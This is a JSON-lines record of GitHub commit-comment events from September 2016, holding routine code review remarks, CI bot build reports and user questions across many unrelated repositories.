{"id":"4565712512","type":"CommitCommentEvent","actor":{"login":"ianwjhalliday"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19029647,"position":28,"line":805,"path":"src/node_jsvmapi.cc","commit_id":"b2b66198a7449a923d99a5078e021d85047c90d1","created_at":"2016-09-15T02:05:43Z","updated_at":"2016-09-15T02:05:43Z","body":"Why did `data` become `const`?  That seems incorrect since I thought that node::Buffer::New() is creating a new buffer object using `data` as the buffer which would then be modifiable?  Maybe this old version of node didn't allow it to be modified?  Would this be a functionality compat issue?\r\n\r\nOh, does this old version of node not have a node::Buffer::Copy method?\r\n\r\nAre the semantics of napi_buffer_copy the same here as they are in the v6.2 version?"}},"created_at":"2016-09-15T02:05:43Z"}
{"id":"4565712541","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19029649,"position":null,"line":null,"path":null,"commit_id":"55ac1912c41d61e56127a5e3dc310bed3594da79","created_at":"2016-09-15T02:05:44Z","updated_at":"2016-09-15T02:05:44Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-55ac1912c41d61e56127a5e3dc310bed3594da79-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-55ac1912c41d61e56127a5e3dc310bed3594da79-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T02:05:44Z"}
{"id":"4565714813","type":"CommitCommentEvent","actor":{"login":"dschmura"},"repo":{"name":"dschmura/dschmura_website_old"},"payload":{"comment":{"id":19029651,"position":10,"line":58,"path":"config/routes.rb","commit_id":"9ad6f55c8d5b70f6bec87172c8def1365b0fb9ae","created_at":"2016-09-15T02:06:22Z","updated_at":"2016-09-15T02:06:22Z","body":"This is an interesting choice. Have you considered the dependency issues?\r\n"}},"created_at":"2016-09-15T02:06:22Z"}
{"id":"4565716376","type":"CommitCommentEvent","actor":{"login":"dschmura"},"repo":{"name":"dschmura/dschmura_website_old"},"payload":{"comment":{"id":19029659,"position":2,"line":2,"path":"config/routes.rb","commit_id":"9ad6f55c8d5b70f6bec87172c8def1365b0fb9ae","created_at":"2016-09-15T02:07:02Z","updated_at":"2016-09-15T02:07:02Z","body":"Mount at /\r\n"}},"created_at":"2016-09-15T02:07:02Z"}
{"id":"4565720243","type":"CommitCommentEvent","actor":{"login":"jieyu"},"repo":{"name":"Gilbert88/mesos"},"payload":{"comment":{"id":19029679,"position":40,"line":600,"path":"src/slave/containerizer/mesos/containerizer.cpp","commit_id":"9765de296f90e17729cf47f611a6ed612223d578","created_at":"2016-09-15T02:08:38Z","updated_at":"2016-09-15T02:08:38Z","body":"i thought those functions are moved to paths.hpp|cpp?"}},"created_at":"2016-09-15T02:08:38Z"}
{"id":"4565721586","type":"CommitCommentEvent","actor":{"login":"ktbyers"},"repo":{"name":"Juniper/ansible-junos-stdlib"},"payload":{"comment":{"id":19029681,"position":null,"line":null,"path":null,"commit_id":"b5d8877813344567424480d4052eefa4764108cf","created_at":"2016-09-15T02:09:12Z","updated_at":"2016-09-15T02:09:12Z","body":"@vnitinv I am receiving Ansible import errors on junos_install_config (ansible version is ansible 2.1.0.0)\r\n\r\nfatal: [pynet-sf-srx]: FAILED! => {\"changed\": false, \"failed\": true, \"msg\": \"unable to connect to 184.105.247.76: global name 'Device' is not defined\"}\r\n\r\nMy playbook works fine if I roll back to the code right before this commit."}},"created_at":"2016-09-15T02:09:12Z"}
{"id":"4565721649","type":"CommitCommentEvent","actor":{"login":"rfindler"},"repo":{"name":"racket/racket"},"payload":{"comment":{"id":19029682,"position":15,"line":314,"path":"pkgs/racket-doc/xml/xml.scrbl","commit_id":"38622ce2767a36920c34b4b196d49fbbcca1b41d","created_at":"2016-09-15T02:09:13Z","updated_at":"2016-09-15T02:09:13Z","body":"Color me curious: what's the issue with the `for-label` require?"}},"created_at":"2016-09-15T02:09:13Z"}
{"id":"4565721965","type":"CommitCommentEvent","actor":{"login":"jieyu"},"repo":{"name":"Gilbert88/mesos"},"payload":{"comment":{"id":19029684,"position":62,"line":622,"path":"src/slave/containerizer/mesos/containerizer.cpp","commit_id":"9765de296f90e17729cf47f611a6ed612223d578","created_at":"2016-09-15T02:09:21Z","updated_at":"2016-09-15T02:09:21Z","body":"Any reason this is not a member function in containerizer? THis can avoid passing the 'flags'."}},"created_at":"2016-09-15T02:09:21Z"}
{"id":"4565725681","type":"CommitCommentEvent","actor":{"login":"aexmachina"},"repo":{"name":"aexmachina/ember-notify"},"payload":{"comment":{"id":19029693,"position":null,"line":null,"path":null,"commit_id":"d5a81aeec3fdf1bc649f097555f36e996bb10458","created_at":"2016-09-15T02:10:52Z","updated_at":"2016-09-15T02:10:52Z","body":"No it isn't, but I'd certainly welcome a PR!​ We'd probably need to check\nin a way that works for both Ember versions.\n"}},"created_at":"2016-09-15T02:10:52Z"}
{"id":"4565725687","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19029694,"position":null,"line":null,"path":null,"commit_id":"a589d57cd91a7c39bf95a159df891437041e583e","created_at":"2016-09-15T02:10:53Z","updated_at":"2016-09-15T02:10:53Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T02:10:53Z"}
{"id":"4565729087","type":"CommitCommentEvent","actor":{"login":"belfastraven"},"repo":{"name":"airend/android_kernel_bn_omap"},"payload":{"comment":{"id":19029697,"position":null,"line":null,"path":null,"commit_id":"4949a000f08cb397e11df66e6b9a75c9020b1680","created_at":"2016-09-15T02:12:17Z","updated_at":"2016-09-15T02:12:17Z","body":"I wondered why  you removed\r\n\r\nCONFIG_PANEL_NOVATEK=y\r\n\r\nfor the hummingbird configuation?   I know I have tablets with Novatek and Orise panels.  I thought Hydis were in  Amazon devices,  but am not positive about that.  \r\n"}},"created_at":"2016-09-15T02:12:17Z"}
{"id":"4565732873","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19029702,"position":null,"line":null,"path":null,"commit_id":"a589d57cd91a7c39bf95a159df891437041e583e","created_at":"2016-09-15T02:13:55Z","updated_at":"2016-09-15T02:13:55Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T02:13:55Z"}
{"id":"4565733583","type":"CommitCommentEvent","actor":{"login":"sricharan123"},"repo":{"name":"navsreks/DLN-Validation"},"payload":{"comment":{"id":19029706,"position":null,"line":null,"path":null,"commit_id":"c9f15f609c731e034bef937732aaece2a8bd78e5","created_at":"2016-09-15T02:14:10Z","updated_at":"2016-09-15T02:14:10Z","body":" error message for all pattern will be same already there in paper-input \"Driver License Number in invalid.\"\r\nther are two properties declared with same name.. remove one on userProfile"}},"created_at":"2016-09-15T02:14:10Z"}
{"id":"4565737386","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19029717,"position":null,"line":null,"path":null,"commit_id":"0997ad0eec80c2609a372526bdfc30604541ec0c","created_at":"2016-09-15T02:15:42Z","updated_at":"2016-09-15T02:15:42Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0997ad0eec80c2609a372526bdfc30604541ec0c-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T02:15:42Z"}
{"id":"4565738723","type":"CommitCommentEvent","actor":{"login":"RyTekk"},"repo":{"name":"olivieer/android_kernel_sony_msm8994"},"payload":{"comment":{"id":19029719,"position":null,"line":null,"path":null,"commit_id":"4665bfc0c2f9e31d7b17956878ee2a3c6c6fdb92","created_at":"2016-09-15T02:16:14Z","updated_at":"2016-09-15T02:16:14Z","body":"BCMDHD worked for me before, after a rebase I didn't use it and now I pick it again but my device stuck at first white SONY logo, do you have any idea?"}},"created_at":"2016-09-15T02:16:14Z"}
{"id":"4565741985","type":"CommitCommentEvent","actor":{"login":"airend"},"repo":{"name":"airend/android_kernel_bn_omap"},"payload":{"comment":{"id":19029727,"position":null,"line":null,"path":null,"commit_id":"4949a000f08cb397e11df66e6b9a75c9020b1680","created_at":"2016-09-15T02:17:35Z","updated_at":"2016-09-15T02:17:35Z","body":"I thought I moved it to the common defconfig… The end result should be same as before; did it break hummingbird display?"}},"created_at":"2016-09-15T02:17:35Z"}
{"id":"4565742275","type":"CommitCommentEvent","actor":{"login":"jasonm23"},"repo":{"name":"gaqzi/radish"},"payload":{"comment":{"id":19029728,"position":15,"line":14,"path":"maybe/executioners.py","commit_id":"9c46bb5f6b61aee5c08c8bbc6ae776ed3500cb12","created_at":"2016-09-15T02:17:42Z","updated_at":"2016-09-15T02:17:42Z","body":"I think you mean Executor ... but I suppose a Raddish Executioner is quite funny."}},"created_at":"2016-09-15T02:17:42Z"}
{"id":"4565743845","type":"CommitCommentEvent","actor":{"login":"HichamDiouri"},"repo":{"name":"HichamDiouri/TP1-partie1-INF2170"},"payload":{"comment":{"id":19029731,"position":34,"line":60,"path":"src/BlackJack.java","commit_id":"9c92e3363703218bd2f73f808975c07f152c2ca4","created_at":"2016-09-15T02:18:20Z","updated_at":"2016-09-15T02:18:20Z","body":"Revoir comment on gagne au blackJack"}},"created_at":"2016-09-15T02:18:20Z"}
{"id":"4565747975","type":"CommitCommentEvent","actor":{"login":"HichamDiouri"},"repo":{"name":"HichamDiouri/TP1-partie1-INF2170"},"payload":{"comment":{"id":19029740,"position":18,"line":38,"path":"src/BlackJack.java","commit_id":"9c92e3363703218bd2f73f808975c07f152c2ca4","created_at":"2016-09-15T02:20:02Z","updated_at":"2016-09-15T02:20:02Z","body":"Utiliser nombre de tour pour determiner si blackjack ou reste pour 21"}},"created_at":"2016-09-15T02:20:02Z"}
{"id":"4565753554","type":"CommitCommentEvent","actor":{"login":"MerrickClark"},"repo":{"name":"MerrickClark/dockerfiles"},"payload":{"comment":{"id":19029750,"position":null,"line":null,"path":null,"commit_id":"cfd4c57cfd45106596bb8286b999c95539727daa","created_at":"2016-09-15T02:22:17Z","updated_at":"2016-09-15T02:22:17Z","body":"note this error was specific to my use case, I'm guessing using original will work fine :-)"}},"created_at":"2016-09-15T02:22:17Z"}
{"id":"4565757034","type":"CommitCommentEvent","actor":{"login":"jiabinxu"},"repo":{"name":"jiabinxu/dxDoctor"},"payload":{"comment":{"id":19029754,"position":2,"line":2,"path":"README.md","commit_id":"9503ad35a65209cf5adc11855996ff9d161c1d31","created_at":"2016-09-15T02:23:45Z","updated_at":"2016-09-15T02:23:45Z","body":"拥抱xcode8，拥抱Swift3.0"}},"created_at":"2016-09-15T02:23:45Z"}
{"id":"4565764213","type":"CommitCommentEvent","actor":{"login":"nguillaumin"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":19029769,"position":19,"line":158,"path":"gfx/common/x11_common.c","commit_id":"05df632bd828d7cac1b4c2ca134e94fbdfabc1ab","created_at":"2016-09-15T02:26:40Z","updated_at":"2016-09-15T02:26:40Z","body":"Implemented in #3593"}},"created_at":"2016-09-15T02:26:40Z"}
{"id":"4565764653","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19029773,"position":null,"line":null,"path":null,"commit_id":"5a365e54deb644b86a634dbb422c67c25bcc6393","created_at":"2016-09-15T02:26:50Z","updated_at":"2016-09-15T02:26:50Z","body":"versionNumbers (mitchute) - x86_64-MacOS-10.9-clang: OK (2329 of 2329 tests passed, 21 test warnings)\n\n * 21 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T02:26:50Z"}
{"id":"4565765851","type":"CommitCommentEvent","actor":{"login":"alexmancheno"},"repo":{"name":"alexmancheno/OOP-in-C-Course-Assignments"},"payload":{"comment":{"id":19029779,"position":null,"line":null,"path":null,"commit_id":"8f89ef4696a077c8e819a838241cbd071b1fdd5d","created_at":"2016-09-15T02:27:17Z","updated_at":"2016-09-15T02:27:17Z","body":"Hey, thanks man! So the part that I didn't fully understand about this solution was this: suppose we're in column 7 of q[] and we're able to place the queen on some row on that column. My understanding of what happens next (per lines 44-51) is that c increments to 8, the solution is printed, and then q[8] is set to -1.. and then we resume the recursion until every solution is found. But if I add in \"c--;\" after the solution is printed but before we reset the column we're on to -1  (between lines 47 and 50), the recursion finds no solution. I guess I'm just confused how my current setup works- it kind of goes against my intuition, haha. "}},"created_at":"2016-09-15T02:27:17Z"}
{"id":"4565767662","type":"CommitCommentEvent","actor":{"login":"todiadiyatmo"},"repo":{"name":"todiadiyatmo/fix-w3tc"},"payload":{"comment":{"id":19029786,"position":null,"line":null,"path":null,"commit_id":"80b2f3d919412052055c1dbf6824d390448b5f2d","created_at":"2016-09-15T02:27:59Z","updated_at":"2016-09-15T02:27:59Z","body":"@nigrosimone hi, i actualy just edit line 963 - 967. how to properly save the file ? i use linux and atom editor, seems the white space is altered when i save the file .."}},"created_at":"2016-09-15T02:27:59Z"}
{"id":"4565768380","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19029793,"position":null,"line":null,"path":null,"commit_id":"49269ce04c82509febb2115873ba743002882775","created_at":"2016-09-15T02:28:16Z","updated_at":"2016-09-15T02:28:16Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-49269ce04c82509febb2115873ba743002882775-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-49269ce04c82509febb2115873ba743002882775-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T02:28:16Z"}
{"id":"4565769527","type":"CommitCommentEvent","actor":{"login":"Tigery890"},"repo":{"name":"Tigery890/Ty"},"payload":{"comment":{"id":19029796,"position":null,"line":null,"path":null,"commit_id":"ce0cbadec776b72c8ebda89d48bf5c6e7d136358","created_at":"2016-09-15T02:28:45Z","updated_at":"2016-09-15T02:28:45Z","body":"1"}},"created_at":"2016-09-15T02:28:45Z"}
{"id":"4565784270","type":"CommitCommentEvent","actor":{"login":"sogokyo"},"repo":{"name":"sogokyo/sogokyo.github.io"},"payload":{"comment":{"id":19029826,"position":null,"line":null,"path":null,"commit_id":"c3bf8e2c98c51c57b86927b7f473ae657b422579","created_at":"2016-09-15T02:34:47Z","updated_at":"2016-09-15T02:34:47Z","body":"Delete AR-Homepage.png"}},"created_at":"2016-09-15T02:34:47Z"}
{"id":"4565792429","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/romo-av"},"payload":{"comment":{"id":19029840,"position":null,"line":null,"path":null,"commit_id":"2a603c025b9892aa5964ffbee9f64675db26fdf0","created_at":"2016-09-15T02:38:04Z","updated_at":"2016-09-15T02:38:04Z","body":"/cc @jcredding "}},"created_at":"2016-09-15T02:38:04Z"}
{"id":"4565792914","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/romo-av"},"payload":{"comment":{"id":19029843,"position":null,"line":null,"path":null,"commit_id":"4007079b48050311c10337a8179dc6f71298092e","created_at":"2016-09-15T02:38:18Z","updated_at":"2016-09-15T02:38:18Z","body":"/cc @jcredding "}},"created_at":"2016-09-15T02:38:18Z"}
{"id":"4565794968","type":"CommitCommentEvent","actor":{"login":"dalanthalar"},"repo":{"name":"rythos42/naflm"},"payload":{"comment":{"id":19029846,"position":null,"line":null,"path":null,"commit_id":"6a730d9dc55081e6feebe76f8952ad10523cfbd5","created_at":"2016-09-15T02:39:10Z","updated_at":"2016-09-15T02:39:10Z","body":"Hi, i'm download obblm-master.zip from https://github.com/nicholasmr/obblm, i have a problem with the install. First send me this error \r\nFatal error: Call to a member function TranslateSkills() on null in /srv/disk13/2201587/www/lmbb.eu.pn/header.php on line 165\r\n\r\ni copy/paste the new code and send me a new message\r\nParse error: syntax error, unexpected 'global' (T_GLOBAL) in /srv/disk13/2201587/www/lmbb.eu.pn/header.php on line 163\r\n\r\nWhat can i do?\r\n\r\nThanks"}},"created_at":"2016-09-15T02:39:10Z"}
{"id":"4565796008","type":"CommitCommentEvent","actor":{"login":"daadu"},"repo":{"name":"fanatic007/Notapp"},"payload":{"comment":{"id":19029848,"position":3,"line":64,"path":"app/app.iml","commit_id":"8f1dbcb4de7a9c0cd5bab1d9867784c39e5eb287","created_at":"2016-09-15T02:39:36Z","updated_at":"2016-09-15T02:39:36Z","body":"is it in playstore?\r\n\r\nfinally you using git!!"}},"created_at":"2016-09-15T02:39:36Z"}
{"id":"4565798883","type":"CommitCommentEvent","actor":{"login":"kd0aij"},"repo":{"name":"PX4/DriverFramework"},"payload":{"comment":{"id":19029858,"position":null,"line":null,"path":null,"commit_id":"6bdc8bce97c619a77276d183f88ee2d6efce4cbf","created_at":"2016-09-15T02:40:45Z","updated_at":"2016-09-15T02:40:45Z","body":"The datasheet shows left-handed coordinate frames for accel and gyro. That's probably the source of the problem. The frame shown for the magnetometer is right-handed, but the sign of the X axis is flipped relative to the accel and gyro frames. "}},"created_at":"2016-09-15T02:40:45Z"}
{"id":"4565800011","type":"CommitCommentEvent","actor":{"login":"macropin"},"repo":{"name":"IRNAS/Troublemaker2"},"payload":{"comment":{"id":19029864,"position":null,"line":null,"path":null,"commit_id":"3feb24c522f09800f330568e186ed6ba891ef1bf","created_at":"2016-09-15T02:41:12Z","updated_at":"2016-09-15T02:41:12Z","body":"Did you mean to commit changes to all these files?"}},"created_at":"2016-09-15T02:41:12Z"}
{"id":"4565802215","type":"CommitCommentEvent","actor":{"login":"russelhampton05"},"repo":{"name":"russelhampton05/MenMew"},"payload":{"comment":{"id":19029871,"position":19,"line":19,"path":"App Prototypes/Test_003_TableViews/Test_003_TableViews/MenuCell.swift","commit_id":"547114f19270c946322fc685522ff4e93082489c","created_at":"2016-09-15T02:42:09Z","updated_at":"2016-09-15T02:42:09Z","body":"good use of weak"}},"created_at":"2016-09-15T02:42:09Z"}
{"id":"4565803627","type":"CommitCommentEvent","actor":{"login":"russelhampton05"},"repo":{"name":"russelhampton05/MenMew"},"payload":{"comment":{"id":19029874,"position":12,"line":12,"path":"App Prototypes/Test_003_TableViews/Test_003_TableViews/MenuCell.swift","commit_id":"547114f19270c946322fc685522ff4e93082489c","created_at":"2016-09-15T02:42:46Z","updated_at":"2016-09-15T02:42:46Z","body":"what is this variable used for?"}},"created_at":"2016-09-15T02:42:46Z"}
{"id":"4565804003","type":"CommitCommentEvent","actor":{"login":"Oapinzon"},"repo":{"name":"Oapinzon/uip-iiiq2016-prog3"},"payload":{"comment":{"id":19029875,"position":null,"line":null,"path":null,"commit_id":"f1438762a45bd015ddffb4e0c4451f963637865c","created_at":"2016-09-15T02:42:54Z","updated_at":"2016-09-15T02:42:54Z","body":"GPL (General Public License)  O GNU (GNU General Public License)\r\n\r\nEs la licencia más ampliamente usada en el mundo del software y garantiza a los usuarios finales (personas, organizaciones, compañías) la libertad de usar, estudiar, compartir (copiar) y modificar el software. Su propósito es declarar que el software cubierto por esta licencia es software libre y protegerlo de intentos de apropiación que restrinjan esas libertades a los usuarios. Esta licencia fue creada originalmente por Richard Stallman fundador de la Free Software Foundation (FSF) para el proyecto GNU.\r\n\r\nHistoria\r\nLa GPL fue creada por Richard Stallman en 1989 para proteger los programas liberados como parte del proyecto GNU. La GPL original se basó en la unificación de licencias similares utilizadas en versiones anteriores de GNU Emacs, GNU Debugger y de GNU C Compiler. Estas licencias contenían disposiciones similares a las actuales GPL, pero eran específicas para cada programa, haciéndolos incompatibles, a pesar de ser la misma licencia. El objetivo de Stallman era producir una licencia que pudiera ser aplicada a cualquier proyecto, por lo que es posible utilizarlas en muchos proyectos para compartir código.\r\n\r\nLa segunda parte de esta licencia, versión 2, fue liberada en 1991. Durante los siguientes 15 años"}},"created_at":"2016-09-15T02:42:54Z"}
{"id":"4565807429","type":"CommitCommentEvent","actor":{"login":"russelhampton05"},"repo":{"name":"russelhampton05/MenMew"},"payload":{"comment":{"id":19029881,"position":309,"line":309,"path":"App Prototypes/Test_003_TableViews/Test_003_TableViews/Test_003_TableViews.xcodeproj/project.pbxproj","commit_id":"547114f19270c946322fc685522ff4e93082489c","created_at":"2016-09-15T02:44:24Z","updated_at":"2016-09-15T02:44:24Z","body":"Check to see if you can remove this file. I'm not sure this should be in version control. You can \"untrack\" it if it isn't required for compilation."}},"created_at":"2016-09-15T02:44:24Z"}
{"id":"4565811869","type":"CommitCommentEvent","actor":{"login":"davidfowl"},"repo":{"name":"dotnet/corefxlab"},"payload":{"comment":{"id":19029890,"position":null,"line":null,"path":null,"commit_id":"292ea78eecb4b6ec7cc35d7e4c59a010cf59fd54","created_at":"2016-09-15T02:46:12Z","updated_at":"2016-09-15T02:46:12Z","body":"Ah interesting 😄  Will take look at the linked list impl."}},"created_at":"2016-09-15T02:46:12Z"}
{"id":"4565815074","type":"CommitCommentEvent","actor":{"login":"russelhampton05"},"repo":{"name":"russelhampton05/MenMew"},"payload":{"comment":{"id":19029894,"position":63,"line":63,"path":"App Prototypes/Test_003_TableViews/Test_003_TableViews/Test_003_TableViews/PopupViewController.swift","commit_id":"547114f19270c946322fc685522ff4e93082489c","created_at":"2016-09-15T02:47:28Z","updated_at":"2016-09-15T02:47:28Z","body":"Doesn't this assume the parent will have a tableview? Maybe there is a better way to do this so the pop up can be used at any point in the app by any viewcontroller."}},"created_at":"2016-09-15T02:47:28Z"}
{"id":"4565819840","type":"CommitCommentEvent","actor":{"login":"russelhampton05"},"repo":{"name":"russelhampton05/MenMew"},"payload":{"comment":{"id":19029904,"position":null,"line":null,"path":null,"commit_id":"547114f19270c946322fc685522ff4e93082489c","created_at":"2016-09-15T02:49:29Z","updated_at":"2016-09-15T02:49:29Z","body":"Cool stuff Jon. Be sure to please remove the binary files from the repository. You have 7 of them committed. You'll need to make a rule for these type of files in the .gitignore but also untrack the ones you've already committed."}},"created_at":"2016-09-15T02:49:29Z"}
{"id":"4565821002","type":"CommitCommentEvent","actor":{"login":"printer83mph"},"repo":{"name":"printer83mph/MAPS"},"payload":{"comment":{"id":19029908,"position":null,"line":null,"path":null,"commit_id":"399a48000b0ca41f02889d714307637286e83a04","created_at":"2016-09-15T02:50:01Z","updated_at":"2016-09-15T02:50:01Z","body":"Should have named this first commit ☹"}},"created_at":"2016-09-15T02:50:01Z"}
{"id":"4565824241","type":"CommitCommentEvent","actor":{"login":"Jessiegarc"},"repo":{"name":"Jessiegarc/QRcode"},"payload":{"comment":{"id":19029915,"position":2,"line":2,"path":"README.md","commit_id":"dbf9b2a3210800ba4845c20e609bd4dc561eac04","created_at":"2016-09-15T02:51:21Z","updated_at":"2016-09-15T02:51:21Z","body":"Desarrollado en Java con base de datos MySQL y conexion remota con una app movil desarrollada n Adroid Studio"}},"created_at":"2016-09-15T02:51:21Z"}
{"id":"4565824545","type":"CommitCommentEvent","actor":{"login":"ayust"},"repo":{"name":"eve-val/evelink"},"payload":{"comment":{"id":19029917,"position":47,"line":52,"path":".travis-pre-run.py","commit_id":"cac7e1d083f57b94bf417516e6f372214a382f2e","created_at":"2016-09-15T02:51:28Z","updated_at":"2016-09-15T02:51:28Z","body":"(To be clear, this is super lazy and sometimes incorrect, but we care mostly that we get any SDK, having the latest is just nice.)"}},"created_at":"2016-09-15T02:51:28Z"}
{"id":"4565833395","type":"CommitCommentEvent","actor":{"login":"jdesrosiers"},"repo":{"name":"json-schema-org/json-schema-spec"},"payload":{"comment":{"id":19029934,"position":11,"line":67,"path":"jsonschema-schema.xml","commit_id":"11a0063243c2941d9fe9ed6ca0998157bbdd4d2a","created_at":"2016-09-15T02:55:12Z","updated_at":"2016-09-15T02:55:12Z","body":"Typo: Should be \"to make assertions\" not \"to makes assertions\""}},"created_at":"2016-09-15T02:55:12Z"}
{"id":"4565835814","type":"CommitCommentEvent","actor":{"login":"jdesrosiers"},"repo":{"name":"json-schema-org/json-schema-spec"},"payload":{"comment":{"id":19029946,"position":79,"line":124,"path":"jsonschema-schema.xml","commit_id":"11a0063243c2941d9fe9ed6ca0998157bbdd4d2a","created_at":"2016-09-15T02:56:19Z","updated_at":"2016-09-15T02:56:19Z","body":"Typo: Should be \"arbitrary precision\" not \"arbitrary prevision\"."}},"created_at":"2016-09-15T02:56:19Z"}
{"id":"4570370268","type":"CommitCommentEvent","actor":{"login":"ConstantineZarzhytskyy"},"repo":{"name":"VladPolynko/gem4me-ad"},"payload":{"comment":{"id":19043441,"position":5,"line":21,"path":"client/dashboard/dashboard.html","commit_id":"e71172c56d3710db033094c32675d962e34c4410","created_at":"2016-09-15T20:00:08Z","updated_at":"2016-09-15T20:00:08Z","body":"camelcase?"}},"created_at":"2016-09-15T20:00:08Z"}
{"id":"4570372450","type":"CommitCommentEvent","actor":{"login":"matthayes"},"repo":{"name":"confluentinc/confluent-kafka-python"},"payload":{"comment":{"id":19043448,"position":73,"line":155,"path":"confluent_kafka/avro/serializer/MessageSerializer.py","commit_id":"3b27212cf423e3a24426b3d76bc583993c5d0a68","created_at":"2016-09-15T20:00:29Z","updated_at":"2016-09-15T20:00:29Z","body":"nit: `log.exception` would include the stacktrace, which you may want in this case for diagnosis"}},"created_at":"2016-09-15T20:00:29Z"}
{"id":"4570373511","type":"CommitCommentEvent","actor":{"login":"ConstantineZarzhytskyy"},"repo":{"name":"VladPolynko/gem4me-ad"},"payload":{"comment":{"id":19043452,"position":6,"line":64,"path":"client/dashboard/dashboard.js","commit_id":"e71172c56d3710db033094c32675d962e34c4410","created_at":"2016-09-15T20:00:39Z","updated_at":"2016-09-15T20:00:39Z","body":"hmmm.... i thing this will be redirect on auth page"}},"created_at":"2016-09-15T20:00:39Z"}
{"id":"4570373591","type":"CommitCommentEvent","actor":{"login":"knewter"},"repo":{"name":"knewter/shared_counters"},"payload":{"comment":{"id":19043453,"position":null,"line":null,"path":null,"commit_id":"c0c25281f86f2e96f3194d2aa908ea26905adfd9","created_at":"2016-09-15T20:00:39Z","updated_at":"2016-09-15T20:00:39Z","body":"You can only type \"initial commit\" so many times before literally going insane. @aaronrenner"}},"created_at":"2016-09-15T20:00:39Z"}
{"id":"4570379108","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/vault-updater"},"payload":{"comment":{"id":19043474,"position":null,"line":null,"path":null,"commit_id":"1ce6f0baa4d1eca98e1aa8a5078276d20cce77a2","created_at":"2016-09-15T20:01:38Z","updated_at":"2016-09-15T20:01:38Z","body":"++"}},"created_at":"2016-09-15T20:01:38Z"}
{"id":"4570379885","type":"CommitCommentEvent","actor":{"login":"ConstantineZarzhytskyy"},"repo":{"name":"VladPolynko/gem4me-ad"},"payload":{"comment":{"id":19043480,"position":7,"line":65,"path":"client/dashboard/dashboard.js","commit_id":"e71172c56d3710db033094c32675d962e34c4410","created_at":"2016-09-15T20:01:46Z","updated_at":"2016-09-15T20:01:46Z","body":"async method"}},"created_at":"2016-09-15T20:01:46Z"}
